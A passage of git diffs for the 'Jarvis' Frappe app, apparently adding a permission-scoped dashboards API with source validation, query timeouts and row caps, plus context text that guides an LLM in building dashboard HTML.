+	visibility matrix; always a parenthesized valid expression so callers can
+	splice it with ``and``. Values go through frappe.db.escape — role names
+	and user emails are org-author-controlled strings."""
+	user = user or frappe.session.user
+	if has_jarvis_admin_access(user):
+		return "(1=1)"
+	table = "`tabJarvis Dashboard`"
+	escaped_user = frappe.db.escape(user)
+	clauses = [
+		f"{table}.`owner` = {escaped_user}",
+		f"{table}.`scope` = 'Org'",
+	]
+	roles = [r for r in frappe.get_roles(user) if r]
+	if roles:
+		role_list = ", ".join(frappe.db.escape(r) for r in roles)
+		clauses.append(
+			f"({table}.`scope` = 'Role' and {table}.`target_role` in ({role_list}))"
+		)
+	# Blank/NULL scope is PRIVATE — it rides the target_user clause (and the
+	# owner clause above), never the Org one.
+	clauses.append(
+		f"(coalesce({table}.`scope`, '') in ('', 'User') "
+		f"and {table}.`target_user` = {escaped_user})"
+	)
+	return "(" + " or ".join(clauses) + ")"
+
+
+def dashboard_query_conditions(user: str | None = None) -> str:
+	"""hooks.permission_query_conditions entry — scopes every Desk/ORM list
+	query. Empty string (no restriction) for the admin tier."""
+	user = user or frappe.session.user
+	if has_jarvis_admin_access(user):
+		return ""
+	return visible_scope_condition(user)
+
+
+def has_dashboard_permission(doc, ptype: str = "read", user: str | None = None) -> bool:
+	"""hooks.has_permission entry — per-doc gate. Read-shaped ptypes follow
+	the visibility matrix; write and delete follow the edit matrix; everything
+	else (including "create") defers — hooks can only deny, and the create-time
+	scope gate lives in the DocType controller. True defers to the role-perm
+	check."""
+	user = user or frappe.session.user
+	if ptype in _READ_PTYPES:
+		return can_read_dashboard(doc, user)
+	if ptype in ("write", "delete"):
+		return can_edit_dashboard(doc, user)
+	return True

--- a/jarvis/chat/dashboards_api.py
+++ b/jarvis/chat/dashboards_api.py
@@ -304,6 +304,13 @@ def _normalize_source_rows(sources) -> list[dict]:
 			args = s.get("args")
 			if isinstance(args, dict):
 				spec = args.get("spec") if isinstance(args.get("spec"), dict) else args
+		# double-wrap drift ({"spec": {"spec": {...}}}): unwrap lone spec keys
+		while (
+			isinstance(spec, dict)
+			and len(spec) == 1
+			and isinstance(spec.get("spec"), dict)
+		):
+			spec = spec["spec"]
 		if isinstance(spec, (dict, list)):
 			spec = frappe.as_json(spec)
 		rows.append({

--- a/jarvis/chat/dashboards_api.py
+++ b/jarvis/chat/dashboards_api.py
@@ -73,6 +73,18 @@ _DASHBOARD_SORTABLE = {
 _GET_LIST_SPEC_KEYS = {"doctype", "fields", "filters", "order_by", "limit", "parent_doctype"}
 _RUN_REPORT_SPEC_KEYS = {"report_name", "filters"}
 
+# A get_list order_by: one or more `fieldname [asc|desc]` tokens, comma-joined.
+# fieldname allows an optional `child_table.field` / backtick-free dotted path.
+_ORDER_BY_RE = re.compile(
+	r"^\s*[a-zA-Z_][\w.]*(?:\s+(?:asc|desc))?"
+	r"(?:\s*,\s*[a-zA-Z_][\w.]*(?:\s+(?:asc|desc))?)*\s*$",
+	re.IGNORECASE,
+)
+
+# Per-request wall-clock ceiling (seconds) for the dashboard data runner, so a
+# heavy report/query can't pin a web worker. MariaDB max_statement_time.
+_SOURCE_STMT_TIMEOUT_S = 20
+
 
 # --------------------------------------------------------------------------- #
 # shared helpers
@@ -99,6 +111,17 @@ def _clear_perm_message_noise() -> None:
 
 def _error_envelope(code: str, message: str) -> dict:
 	return {"ok": False, "error": {"code": code, "message": message}}
+
+
+def _set_stmt_timeout(seconds: int) -> None:
+	"""Best-effort per-request statement timeout so a heavy dashboard source
+	can't pin a web worker. MariaDB's max_statement_time is a session variable
+	in seconds; a no-op on other backends or if the SET fails."""
+	try:
+		if frappe.db.db_type == "mariadb":
+			frappe.db.sql("SET SESSION max_statement_time = %s", (seconds,))
+	except Exception:
+		pass
 
 
 def _dashboard_detail(doc) -> dict:
@@ -464,6 +487,18 @@ def _validate_get_list_spec(label: str, spec: dict) -> None:
 			frappe.throw(
 				_("Source '{0}': limit must be an integer between 1 and 1000.").format(label)
 			)
+	# order_by is handed straight to frappe.get_list; validate it ourselves
+	# (whitelisted `fieldname [asc|desc]` tokens) rather than trusting the ORM
+	# to sanitize an order-by expression.
+	if "order_by" in spec:
+		ob = spec["order_by"]
+		if not isinstance(ob, str) or not _ORDER_BY_RE.match(ob.strip()):
+			frappe.throw(
+				_(
+					"Source '{0}': order_by must be 'fieldname' or "
+					"'fieldname asc|desc' (optionally comma-separated)."
+				).format(label)
+			)
 
 
 def _validate_run_report_spec(label: str, spec: dict) -> None:
@@ -534,6 +569,9 @@ def run_dashboard_source(dashboard: str, source_name: str) -> dict:
 	tool = row.tool
 	columns = None
 	t0 = time.monotonic()
+	# Bound the runner's wall-clock so a heavy report/query can't pin a web
+	# worker (MariaDB only; best-effort). Scoped to this whitelisted request.
+	_set_stmt_timeout(_SOURCE_STMT_TIMEOUT_S)
 	try:
 		if tool == "query":
 			from jarvis.tools.query import query as _query
@@ -563,7 +601,10 @@ def run_dashboard_source(dashboard: str, source_name: str) -> dict:
 					),
 				)
 			columns = res.get("columns") or []
-			rows = res["result"]
+			# run_report has no inherent row cap (query/get_list are ≤1000 by the
+			# tools); cap here so a huge report never materializes the full result
+			# set into the browser payload. The post-loop slice still applies.
+			rows = res["result"][: DASHBOARD_MAX_ROWS + 1]
 		else:
 			return _error_envelope(
 				"InvalidArgumentError", _("Unsupported tool: {0}").format(tool)

--- a/jarvis/chat/dashboards_api.py
+++ b/jarvis/chat/dashboards_api.py
@@ -281,19 +281,33 @@ def _normalize_source_rows(sources) -> list[dict]:
 	dicts. ``spec`` may arrive as a JSON object (the natural authoring shape in
 	the html block) or a pre-serialized string; the child field stores a
 	string. Shape errors throw; content validation happens in the controller
-	via ``_validate_source_row``."""
+	via ``_validate_source_row``.
+
+	LLM-authored blocks drift toward the tool-call surface, so the common
+	dialects are folded into the canonical shape rather than rejected:
+	``id``/``name`` for ``source_name``, a ``jarvis__`` tool prefix, and
+	``args``/``args.spec`` for ``spec`` (the runtime bridge normalizes the
+	same way, so stored rows and rendered widgets always agree)."""
 	if not isinstance(sources, list):
 		frappe.throw(_("sources must be a list."))
 	rows: list[dict] = []
 	for i, s in enumerate(sources):
 		if not isinstance(s, dict):
 			frappe.throw(_("sources[{0}] must be an object.").format(i))
+		name = s.get("source_name") or s.get("id") or s.get("name")
+		tool = s.get("tool")
+		if isinstance(tool, str) and tool.startswith("jarvis__"):
+			tool = tool[len("jarvis__"):]
 		spec = s.get("spec")
+		if spec is None:
+			args = s.get("args")
+			if isinstance(args, dict):
+				spec = args.get("spec") if isinstance(args.get("spec"), dict) else args
 		if isinstance(spec, (dict, list)):
 			spec = frappe.as_json(spec)
 		rows.append({
-			"source_name": s.get("source_name"),
-			"tool": s.get("tool"),
+			"source_name": name,
+			"tool": tool,
 			"spec": spec if isinstance(spec, str) else "",
 		})
 	return rows

--- a/jarvis/chat/dashboards_api.py
+++ b/jarvis/chat/dashboards_api.py
@@ -1,0 +1,570 @@
+"""SPA-facing API for the Jarvis Dashboards page.
+
+Whitelisted endpoints for the ``/jarvis`` Dashboards UI: caps probe, paginated
+dashboard list (frozen ``{rows, total, has_more, start, page_length}`` shape
+inside the ``{ok, data}`` envelope), scope-visibility-filtered CRUD, and the
+view-time data runner (``run_dashboard_source`` — always executes the SAVED
+spec as the SESSION user; there is deliberately no spec parameter, so a viewer
+can never smuggle an ad-hoc query through a shared dashboard). Mirrors the
+shape of ``jarvis.chat.triggers_api`` (whose list-page helpers it reuses via
+``jarvis.chat.macros_api``).
+
+Visibility: the list uses raw SQL, which bypasses the ORM permission hooks, so
+``dashboard_permissions.visible_scope_condition()`` is spliced into the WHERE
+for non-admins (the wiki list does the same). Per-doc reads go through
+``doc.check_permission`` (the has_permission hook).
+
+Error contract of ``run_dashboard_source`` (always HTTP 200):
+``{ok: True, data: {source_name, tool, rows[, columns], truncated, took_ms}}``
+or ``{ok: False, error: {code, message}}`` with code one of
+``PermissionError`` / ``InvalidArgumentError`` / ``InternalError`` (internal
+errors are logged server-side and never leak tracebacks).
+"""
+
+from __future__ import annotations
+
+import re
+import time
+
+import frappe
+from frappe import _
+
+from jarvis.chat import dashboard_permissions
+from jarvis.chat.macros_api import _clamp_page, _lk, _load_filters
+from jarvis.exceptions import InvalidArgumentError, PermissionDeniedError
+from jarvis.permissions import has_jarvis_admin_access, require_jarvis_user
+
+DASHBOARD = "Jarvis Dashboard"
+
+_ALLOWED_TOOLS = {"query", "run_report", "get_list"}
+_MAX_SOURCES = 12
+_MAX_SPEC_CHARS = 32_000
+_MAX_HTML_CHARS = 1_000_000
+# Post-fetch hard cap on rows returned to the dashboard renderer. Sits above
+# the tools' own limits (query/get_list cap at limit<=1000; run_report has no
+# limit) so it only ever bites report results — sliced, never errored.
+DASHBOARD_MAX_ROWS = 2000
+
+# The declared-sources block inside the dashboard HTML document:
+# <script type="application/json" id="jarvis-sources">{"sources": [...]}</script>
+_SOURCES_BLOCK_RE = re.compile(
+	r'<script[^>]*\bid=["\']jarvis-sources["\'][^>]*>(.*?)</script>',
+	re.I | re.S,
+)
+
+# Fields a create/update payload may set. Everything else (owner, target_user
+# — server-derived for User scope, dashboard_type — always derived, timestamps)
+# is server-owned; unknown keys throw.
+_ALLOWED_PAYLOAD_FIELDS = {
+	"name", "dashboard_title", "description", "html", "scope", "target_role",
+	"sources", "source_conversation",
+}
+
+_SCOPES = {"Org", "Role", "User"}
+_TYPES = {"Static", "Connected"}
+
+_DASHBOARD_FILTERS = {"scope", "dashboard_type", "owner"}
+_DASHBOARD_SORTABLE = {
+	"modified": "modified", "dashboard_title": "dashboard_title",
+	"dashboard_type": "dashboard_type", "scope": "scope", "owner": "owner",
+}
+
+# Per-tool spec key allow-lists (unknown keys throw at save time).
+_GET_LIST_SPEC_KEYS = {"doctype", "fields", "filters", "order_by", "limit", "parent_doctype"}
+_RUN_REPORT_SPEC_KEYS = {"report_name", "filters"}
+
+
+# --------------------------------------------------------------------------- #
+# shared helpers
+# --------------------------------------------------------------------------- #
+def _order_by(sort_field: str, sort_dir: str, sortable: dict, default_field: str) -> str:
+	"""Whitelisted ORDER BY (unknown sort field throws — same strictness as the
+	triggers list)."""
+	field = (sort_field or "").strip() or default_field
+	if field not in sortable:
+		frappe.throw(_("Unknown sort field: {0}").format(field))
+	d = "desc" if (sort_dir or "desc").lower() == "desc" else "asc"
+	return f"`{sortable[field]}` {d}, `name` asc"
+
+
+def _clear_perm_message_noise() -> None:
+	"""Drop any messages ``frappe.has_permission`` pushed onto the message log
+	on a denied path ("User X does not have doctype access …"), so they never
+	leak back to the client in ``_server_messages``. Best-effort."""
+	try:
+		frappe.local.message_log = []
+	except Exception:
+		pass
+
+
+def _error_envelope(code: str, message: str) -> dict:
+	return {"ok": False, "error": {"code": code, "message": message}}
+
+
+def _dashboard_detail(doc) -> dict:
+	"""Full dashboard detail for the editor/viewer. ``can_edit`` tells the SPA
+	whether to offer the edit surfaces to this session user."""
+	return {
+		"name": doc.name,
+		"dashboard_title": doc.dashboard_title,
+		"description": doc.description or "",
+		"dashboard_type": doc.dashboard_type,
+		"scope": doc.scope,
+		"target_role": doc.target_role or "",
+		"target_user": doc.target_user or "",
+		"html": doc.html or "",
+		"sources": [
+			{"source_name": s.source_name, "tool": s.tool, "spec": s.spec or ""}
+			for s in (doc.sources or [])
+		],
+		"source_conversation": doc.source_conversation or "",
+		"owner": doc.owner,
+		"modified": str(doc.modified),
+		"can_edit": dashboard_permissions.can_edit_dashboard(doc),
+	}
+
+
+# --------------------------------------------------------------------------- #
+# caps probe
+# --------------------------------------------------------------------------- #
+@frappe.whitelist()
+@require_jarvis_user
+def get_dashboards_caps() -> dict:
+	"""Single gating probe for the Dashboards page: which scopes the caller
+	may create in, which roles they may target, the size caps, and whether the
+	chat side can even produce canvas artifacts on this bench (self-hosted
+	chats have no gateway canvas route)."""
+	from jarvis import selfhost
+
+	return {
+		"ok": True,
+		"data": {
+			"creatable_scopes": dashboard_permissions.creatable_scopes(),
+			"manageable_roles": dashboard_permissions.manageable_roles(),
+			"max_sources": _MAX_SOURCES,
+			"max_html_chars": _MAX_HTML_CHARS,
+			"max_rows": DASHBOARD_MAX_ROWS,
+			"canvas_available": not selfhost.is_self_hosted(),
+		},
+	}
+
+
+# --------------------------------------------------------------------------- #
+# list / detail
+# --------------------------------------------------------------------------- #
+@frappe.whitelist()
+@require_jarvis_user
+def list_dashboards_page(
+	search: str = "",
+	filters: str = "{}",
+	sort_field: str = "modified",
+	sort_dir: str = "desc",
+	start: int = 0,
+	page_length: int = 20,
+) -> dict:
+	"""Scope-visible dashboards, server-side search / filter / sort / paginate.
+	Raw SQL bypasses the ORM permission hooks, so the visibility fragment is
+	spliced into the WHERE for non-admins. Frozen envelope in ``data``."""
+	start, pl = _clamp_page(start, page_length)
+	f = _load_filters(filters, _DASHBOARD_FILTERS)
+
+	conds = ["1=1"]
+	params: dict = {"start": start, "page_length": pl}
+	if search:
+		params["q"] = f"%{_lk(search)}%"
+		conds.append("(dashboard_title LIKE %(q)s OR description LIKE %(q)s)")
+	if "scope" in f:
+		if f["scope"] not in _SCOPES:
+			frappe.throw(_("Invalid scope filter."))
+		params["scope"] = f["scope"]
+		conds.append("scope = %(scope)s")
+	if "dashboard_type" in f:
+		if f["dashboard_type"] not in _TYPES:
+			frappe.throw(_("Invalid dashboard_type filter."))
+		params["dashboard_type"] = f["dashboard_type"]
+		conds.append("dashboard_type = %(dashboard_type)s")
+	if "owner" in f:
+		params["owner"] = str(f["owner"])
+		conds.append("owner = %(owner)s")
+	if not has_jarvis_admin_access():
+		# Values inside are frappe.db.escape'd; spliced (not parameterized)
+		# because the role list is variable-length — same as the wiki list.
+		conds.append(dashboard_permissions.visible_scope_condition())
+
+	where = " AND ".join(conds)
+	order = _order_by(sort_field, sort_dir, _DASHBOARD_SORTABLE, "modified")
+
+	total = frappe.db.sql(
+		f"SELECT COUNT(*) FROM `tabJarvis Dashboard` WHERE {where}", params
+	)[0][0]
+	rows = frappe.db.sql(
+		f"""SELECT name, dashboard_title, description, dashboard_type, scope,
+		target_role, target_user, owner, modified
+		FROM `tabJarvis Dashboard`
+		WHERE {where}
+		ORDER BY {order}
+		LIMIT %(page_length)s OFFSET %(start)s""",
+		params, as_dict=True,
+	)
+	for r in rows:
+		r["modified"] = str(r["modified"])
+
+	return {
+		"ok": True,
+		"data": {
+			"rows": rows,
+			"total": total,
+			"has_more": start + len(rows) < total,
+			"start": start,
+			"page_length": pl,
+		},
+	}
+
+
+@frappe.whitelist()
+@require_jarvis_user
+def get_dashboard(name: str) -> dict:
+	"""Full detail of one dashboard (read is scope-gated by the has_permission
+	hook via check_permission)."""
+	doc = frappe.get_doc(DASHBOARD, name)
+	doc.check_permission("read")
+	return {"ok": True, "data": _dashboard_detail(doc)}
+
+
+# --------------------------------------------------------------------------- #
+# save / delete
+# --------------------------------------------------------------------------- #
+def _parse_payload(payload: str) -> dict:
+	try:
+		raw = frappe.parse_json(payload)
+	except Exception:
+		raw = None
+	if not isinstance(raw, dict):
+		frappe.throw(_("Payload must be a JSON object."))
+	out: dict = {}
+	for k, v in raw.items():
+		if k not in _ALLOWED_PAYLOAD_FIELDS:
+			frappe.throw(_("Unknown field: {0}").format(k))
+		out[k] = v
+	return out
+
+
+def _parse_sources_block(html: str) -> list:
+	"""Extract the declared sources from the ``jarvis-sources`` JSON block
+	inside the dashboard HTML. No block -> no sources (a Static dashboard).
+	A present-but-broken block throws — silently ignoring it would save a
+	Connected-looking document with no data wiring."""
+	m = _SOURCES_BLOCK_RE.search(html or "")
+	if not m:
+		return []
+	try:
+		parsed = frappe.parse_json(m.group(1).strip())
+	except Exception:
+		parsed = None
+	if not isinstance(parsed, dict) or not isinstance(parsed.get("sources"), list):
+		frappe.throw(
+			_('The jarvis-sources block must be JSON of the shape {"sources": [...]}.')
+		)
+	return parsed["sources"]
+
+
+def _normalize_source_rows(sources) -> list[dict]:
+	"""Coerce an explicit-payload or html-block sources list into child-row
+	dicts. ``spec`` may arrive as a JSON object (the natural authoring shape in
+	the html block) or a pre-serialized string; the child field stores a
+	string. Shape errors throw; content validation happens in the controller
+	via ``_validate_source_row``."""
+	if not isinstance(sources, list):
+		frappe.throw(_("sources must be a list."))
+	rows: list[dict] = []
+	for i, s in enumerate(sources):
+		if not isinstance(s, dict):
+			frappe.throw(_("sources[{0}] must be an object.").format(i))
+		spec = s.get("spec")
+		if isinstance(spec, (dict, list)):
+			spec = frappe.as_json(spec)
+		rows.append({
+			"source_name": s.get("source_name"),
+			"tool": s.get("tool"),
+			"spec": spec if isinstance(spec, str) else "",
+		})
+	return rows
+
+
+@frappe.whitelist()
+@require_jarvis_user
+def save_dashboard(payload: str) -> dict:
+	"""Create or update a dashboard from a whitelisted-fields JSON payload.
+	``name`` absent -> insert; present -> owner/admin-gated update. An explicit
+	``sources`` list wins; otherwise the sources are (re)parsed from the html's
+	``jarvis-sources`` block whenever html is provided — the html document is
+	the source of truth, so stale child rows never outlive it. Scope gates,
+	caps, per-source validation and the dashboard_type derivation run in the
+	DocType controller."""
+	fields = _parse_payload(payload)
+	name = str(fields.pop("name", None) or "").strip()
+	sources = fields.pop("sources", None)
+	if sources is None and "html" in fields:
+		sources = _parse_sources_block(fields.get("html") or "")
+
+	if name:
+		doc = frappe.get_doc(DASHBOARD, name)
+		if not dashboard_permissions.can_edit_dashboard(doc):
+			frappe.throw(
+				_("Only the dashboard's owner or a Jarvis Admin can edit it."),
+				frappe.PermissionError,
+			)
+		doc.update(fields)
+	else:
+		if not (fields.get("dashboard_title") or "").strip():
+			frappe.throw(_("dashboard_title is required."))
+		if "html" not in fields:
+			frappe.throw(_("html is required."))
+		doc = frappe.get_doc({"doctype": DASHBOARD, **fields})
+
+	if sources is not None:
+		doc.set("sources", [])
+		for row in _normalize_source_rows(sources):
+			doc.append("sources", row)
+
+	if doc.is_new():
+		doc.insert()
+	else:
+		doc.save()
+	frappe.db.commit()
+	return {"ok": True, "data": _dashboard_detail(doc)}
+
+
+@frappe.whitelist()
+@require_jarvis_user
+def delete_dashboard(name: str) -> dict:
+	"""Delete one dashboard (owner or admin tier)."""
+	doc = frappe.get_doc(DASHBOARD, name)
+	if not dashboard_permissions.can_edit_dashboard(doc):
+		frappe.throw(
+			_("Only the dashboard's owner or a Jarvis Admin can delete it."),
+			frappe.PermissionError,
+		)
+	frappe.delete_doc(DASHBOARD, name)
+	frappe.db.commit()
+	return {"ok": True, "data": {"deleted": name}}
+
+
+# --------------------------------------------------------------------------- #
+# per-source spec validation (shared with the DocType controller)
+# --------------------------------------------------------------------------- #
+def _validate_source_row(row: dict) -> None:
+	"""Validate one source row's tool + spec (source_name charset/uniqueness
+	is the controller's job). Everything throws frappe.ValidationError-shaped
+	errors so Desk saves and the SPA get the same clean 417s."""
+	label = row.get("source_name") or "?"
+	tool = (row.get("tool") or "").strip()
+	if tool not in _ALLOWED_TOOLS:
+		frappe.throw(
+			_("Source '{0}': unknown tool '{1}' (allowed: query, run_report, get_list).").format(
+				label, tool
+			)
+		)
+	raw = row.get("spec")
+	if isinstance(raw, str) and len(raw) > _MAX_SPEC_CHARS:
+		frappe.throw(
+			_("Source '{0}': spec must be at most {1} characters.").format(
+				label, _MAX_SPEC_CHARS
+			)
+		)
+	try:
+		spec = frappe.parse_json(raw)
+	except Exception:
+		spec = None
+	if not isinstance(spec, dict):
+		frappe.throw(_("Source '{0}': spec must be a JSON object.").format(label))
+
+	if tool == "query":
+		_validate_query_spec(label, spec)
+	elif tool == "get_list":
+		_validate_get_list_spec(label, spec)
+	else:
+		_validate_run_report_spec(label, spec)
+
+
+def _validate_query_spec(label: str, spec: dict) -> None:
+	"""Reuse the query tool's own validators (shape + doctype existence) so a
+	saved source can't be shaped in a way the runner would reject anyway. The
+	tool raises InvalidArgumentError (not a frappe.ValidationError) — translate
+	to frappe.throw for the save path."""
+	from jarvis.tools.query import _collect_doctypes, _validate_doctype, _validate_spec_shape
+
+	try:
+		_validate_spec_shape(spec)
+		for dt in _collect_doctypes(spec):
+			_validate_doctype(dt)
+	except InvalidArgumentError as e:
+		frappe.throw(_("Source '{0}': {1}").format(label, str(e)))
+	if "limit" in spec:
+		limit = spec["limit"]
+		if isinstance(limit, bool) or not isinstance(limit, int) or not (1 <= limit <= 1000):
+			frappe.throw(
+				_("Source '{0}': limit must be an integer between 1 and 1000.").format(label)
+			)
+
+
+def _validate_get_list_spec(label: str, spec: dict) -> None:
+	unknown = set(spec) - _GET_LIST_SPEC_KEYS
+	if unknown:
+		frappe.throw(
+			_("Source '{0}': unknown get_list spec key(s): {1}").format(
+				label, ", ".join(sorted(unknown))
+			)
+		)
+	doctype = spec.get("doctype")
+	if not isinstance(doctype, str) or not doctype.strip():
+		frappe.throw(_("Source '{0}': doctype is required.").format(label))
+	if not frappe.db.exists("DocType", doctype):
+		frappe.throw(_("Source '{0}': unknown DocType: {1}").format(label, doctype))
+	if "fields" in spec and not (
+		isinstance(spec["fields"], list)
+		and all(isinstance(x, str) for x in spec["fields"])
+	):
+		frappe.throw(_("Source '{0}': fields must be a list of strings.").format(label))
+	if "filters" in spec and not isinstance(spec["filters"], (dict, list)):
+		frappe.throw(_("Source '{0}': filters must be an object or a list.").format(label))
+	if "limit" in spec:
+		limit = spec["limit"]
+		if isinstance(limit, bool) or not isinstance(limit, int) or not (1 <= limit <= 1000):
+			frappe.throw(
+				_("Source '{0}': limit must be an integer between 1 and 1000.").format(label)
+			)
+
+
+def _validate_run_report_spec(label: str, spec: dict) -> None:
+	unknown = set(spec) - _RUN_REPORT_SPEC_KEYS
+	if unknown:
+		frappe.throw(
+			_("Source '{0}': unknown run_report spec key(s): {1}").format(
+				label, ", ".join(sorted(unknown))
+			)
+		)
+	report_name = spec.get("report_name")
+	if not isinstance(report_name, str) or not report_name.strip():
+		frappe.throw(_("Source '{0}': report_name is required.").format(label))
+	if not frappe.db.exists("Report", report_name):
+		frappe.throw(_("Source '{0}': unknown Report: {1}").format(label, report_name))
+	if frappe.db.get_value("Report", report_name, "prepared_report"):
+		frappe.throw(
+			_(
+				"Source '{0}': '{1}' runs as a background Prepared Report and cannot "
+				"serve a dashboard live. Pick a report that runs inline."
+			).format(label, report_name)
+		)
+	if "filters" in spec and not isinstance(spec["filters"], dict):
+		frappe.throw(_("Source '{0}': filters must be an object.").format(label))
+
+
+# --------------------------------------------------------------------------- #
+# view-time data runner
+# --------------------------------------------------------------------------- #
+@frappe.whitelist()
+@require_jarvis_user
+def run_dashboard_source(dashboard: str, source_name: str) -> dict:
+	"""Execute one SAVED data source of a dashboard as the SESSION user.
+
+	Deliberately takes NO spec parameter — the saved child row is the only
+	thing that ever runs, so a shared dashboard can never carry a viewer-
+	supplied query. All record/field-level permissions are the tools' own
+	(query weaves Engine permission conditions; get_list is the ORM;
+	run_report is Frappe's report permission model) — a viewer sees exactly
+	the rows THEY are allowed to see. Errors come back as HTTP-200 envelopes
+	so the dashboard renderer can show a per-tile message."""
+	doc = frappe.get_doc(DASHBOARD, dashboard)
+	try:
+		doc.check_permission("read")
+	except frappe.PermissionError:
+		_clear_perm_message_noise()
+		return _error_envelope(
+			"PermissionError", _("You do not have access to this dashboard.")
+		)
+
+	row = next(
+		(s for s in (doc.sources or []) if s.source_name == source_name), None
+	)
+	if row is None:
+		return _error_envelope(
+			"InvalidArgumentError",
+			_("Unknown source '{0}' on this dashboard.").format(source_name),
+		)
+	try:
+		spec = frappe.parse_json(row.spec)
+	except Exception:
+		spec = None
+	if not isinstance(spec, dict):
+		return _error_envelope(
+			"InvalidArgumentError", _("The saved spec for this source is not valid JSON.")
+		)
+
+	tool = row.tool
+	columns = None
+	t0 = time.monotonic()
+	try:
+		if tool == "query":
+			from jarvis.tools.query import query as _query
+
+			# rows ONLY — the tool's "sql" debug key must never reach a viewer.
+			rows = list(_query(spec, confirm_large=True).get("rows") or [])
+		elif tool == "get_list":
+			from jarvis.tools.get_list import get_list as _get_list
+
+			kwargs = {k: v for k, v in spec.items() if k in _GET_LIST_SPEC_KEYS}
+			kwargs.setdefault("doctype", "")
+			rows = _get_list(confirm_large=True, **kwargs)
+		elif tool == "run_report":
+			from jarvis.tools.run_report import run_report as _run_report
+
+			res = _run_report(spec.get("report_name") or "", spec.get("filters") or {})
+			if (
+				not isinstance(res, dict)
+				or res.get("prepared_report")
+				or not isinstance(res.get("result"), list)
+			):
+				return _error_envelope(
+					"InvalidArgumentError",
+					_(
+						"This report did not return rows inline (it may run as a "
+						"background Prepared Report), so it cannot serve a dashboard."
+					),
+				)
+			columns = res.get("columns") or []
+			rows = res["result"]
+		else:
+			return _error_envelope(
+				"InvalidArgumentError", _("Unsupported tool: {0}").format(tool)
+			)
+	except (PermissionDeniedError, frappe.PermissionError) as e:
+		# has_permission pushes "no access" lines into the message log on the
+		# denied path; clear them so they never ride back in _server_messages.
+		_clear_perm_message_noise()
+		return _error_envelope("PermissionError", str(e) or "permission denied")
+	except InvalidArgumentError as e:
+		return _error_envelope("InvalidArgumentError", str(e))
+	except Exception:
+		frappe.log_error(
+			title="Jarvis: dashboard source run failed",
+			message=frappe.get_traceback(),
+		)
+		return _error_envelope(
+			"InternalError", _("The data source could not be run. The error was logged.")
+		)
+
+	truncated = False
+	if len(rows) > DASHBOARD_MAX_ROWS:
+		rows = rows[:DASHBOARD_MAX_ROWS]
+		truncated = True
+	data = {
+		"source_name": source_name,
+		"tool": tool,
+		"rows": rows,
+		"truncated": truncated,
+		"took_ms": int((time.monotonic() - t0) * 1000),
+	}
+	if columns is not None:
+		data["columns"] = columns
+	return {"ok": True, "data": data}

--- a/jarvis/chat/dashboards_api.py
+++ b/jarvis/chat/dashboards_api.py
@@ -57,7 +57,7 @@ _SOURCES_BLOCK_RE = re.compile(
 # is server-owned; unknown keys throw.
 _ALLOWED_PAYLOAD_FIELDS = {
 	"name", "dashboard_title", "description", "html", "scope", "target_role",
-	"sources", "source_conversation",
+	"sources", "source_conversation", "theme",
 }
 
 _SCOPES = {"Org", "Role", "User"}
@@ -109,6 +109,7 @@ def _dashboard_detail(doc) -> dict:
 		"dashboard_title": doc.dashboard_title,
 		"description": doc.description or "",
 		"dashboard_type": doc.dashboard_type,
+		"theme": doc.theme or "Jarvis",
 		"scope": doc.scope,
 		"target_role": doc.target_role or "",
 		"target_user": doc.target_user or "",

--- a/jarvis/chat/dashboards_api.py
+++ b/jarvis/chat/dashboards_api.py
@@ -136,6 +136,13 @@ def get_dashboards_caps() -> dict:
 	chats have no gateway canvas route)."""
 	from jarvis import selfhost
 
+	stt_enabled = False
+	try:
+		from jarvis.chat import voice
+
+		stt_enabled = bool(voice.stt_config())
+	except Exception:
+		stt_enabled = False
 	return {
 		"ok": True,
 		"data": {
@@ -145,6 +152,7 @@ def get_dashboards_caps() -> dict:
 			"max_html_chars": _MAX_HTML_CHARS,
 			"max_rows": DASHBOARD_MAX_ROWS,
 			"canvas_available": not selfhost.is_self_hosted(),
+			"stt_enabled": stt_enabled,
 		},
 	}
 

--- a/jarvis/chat/turn_handler.py
+++ b/jarvis/chat/turn_handler.py
@@ -1172,6 +1172,16 @@ def _prepend_doc_context(user_message: str, context) -> str:
 	"""
 	if not isinstance(context, dict):
 		return user_message
+	if context.get("page") == "dashboards":
+		return (
+			"[Context: The user is on the Jarvis Dashboards builder page. They want to "
+			"create or iterate on a dashboard/report. Read and follow the "
+			"jarvis-dashboards skill before acting: produce ONE complete self-contained "
+			"HTML document as a canvas artifact per iteration; declare data sources in "
+			"the jarvis-sources JSON block; use window.jarvis.data() for view-time "
+			"data; no external resources.]"
+			f"\n\n{user_message}"
+		)
 	if context.get("page") == "triggers":
 		return (
 			"[Context: The user is on the Jarvis Triggers page. They want to create or "

--- a/jarvis/chat/turn_handler.py
+++ b/jarvis/chat/turn_handler.py
@@ -1199,8 +1199,11 @@ def _prepend_doc_context(user_message: str, context) -> str:
 			"declared inside the HTML exactly as "
 			'<script type="application/json" id="jarvis-sources">{"sources":[{'
 			'"source_name":"<snake_case>","tool":"query|get_list|run_report",'
-			'"spec":{...}}]}</script> where spec is the SAME argument object the '
-			"matching jarvis__ tool takes (test it with that tool first); widgets "
+			'"spec":{...}}]}</script> where spec is the bare argument value - for '
+			'query the {"from":...} DSL object itself, for run_report '
+			'{"report_name":...,"filters":{...}}, for get_list {"doctype":...} - '
+			'never nested inside another "spec" or "args" key (test it with the '
+			"matching jarvis__ tool first); widgets "
 			'fetch with window.jarvis.data("<source_name>"). Style with the injected '
 			"--jd-* CSS variables (--jd-bg/-surface/-ink/-heading/-muted/-line/"
 			"-accent/-font) and the window.JARVIS_THEME.palette chart colors instead "

--- a/jarvis/chat/turn_handler.py
+++ b/jarvis/chat/turn_handler.py
@@ -1173,13 +1173,39 @@ def _prepend_doc_context(user_message: str, context) -> str:
 	if not isinstance(context, dict):
 		return user_message
 	if context.get("page") == "dashboards":
+		# The builder's explicit data-mode toggle overrides wording-based
+		# inference; absent = the agent decides from the ask.
+		mode = context.get("data_mode")
+		if mode == "static":
+			mode_line = (
+				" The user explicitly chose a STATIC one-time report: fetch the data "
+				"now, bake the numbers into the HTML with an as-of time, and do NOT "
+				"declare a jarvis-sources block."
+			)
+		elif mode == "live":
+			mode_line = (
+				" The user explicitly chose a LIVE data-connected dashboard: declare "
+				"every query in the jarvis-sources block and fetch at view time via "
+				"window.jarvis.data() - never bake the numbers in."
+			)
+		else:
+			mode_line = ""
 		return (
 			"[Context: The user is on the Jarvis Dashboards builder page. They want to "
 			"create or iterate on a dashboard/report. Read and follow the "
-			"jarvis-dashboards skill before acting: produce ONE complete self-contained "
-			"HTML document as a canvas artifact per iteration; declare data sources in "
-			"the jarvis-sources JSON block; use window.jarvis.data() for view-time "
-			"data; no external resources.]"
